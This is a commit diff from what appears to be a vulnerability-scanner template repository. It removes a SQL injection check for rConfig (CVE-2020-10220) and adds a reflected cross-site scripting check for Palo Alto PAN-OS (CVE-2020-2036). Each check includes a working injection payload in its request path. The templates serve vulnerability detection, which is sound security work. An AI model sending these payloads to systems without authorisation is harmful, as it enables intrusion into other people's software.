Create CVE-2020-2036.yaml
parent
41c6dfea0c
commit
6c23c6a4f7
|
@ -1,20 +0,0 @@
|
|||
id: CVE-2020-10220
|
||||
info:
|
||||
name: rConfig SQLi
|
||||
author: madrobot
|
||||
severity: high
|
||||
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10220
|
||||
tags: SQLI
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)%20limit%200,1),NULL--"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "[project-discovery]"
|
||||
part: body
|
|
@ -0,0 +1,22 @@
|
|||
id: CVE-2020-2036
|
||||
info:
|
||||
name: Palo Alto Networks Reflected Cross Site Scripting
|
||||
author: madrobot
|
||||
severity: medium
|
||||
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2036
|
||||
reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
|
||||
tags: XSS
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/unauth/php/change_password.php/"><svg/onload=alert(1)>"
|
||||
- "{{BaseURL}}/php/change_password.php/"><svg/onload=alert(1)>"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<svg/onload=alert(1)>"
|
||||
part: body
|
Loading…
Reference in New Issue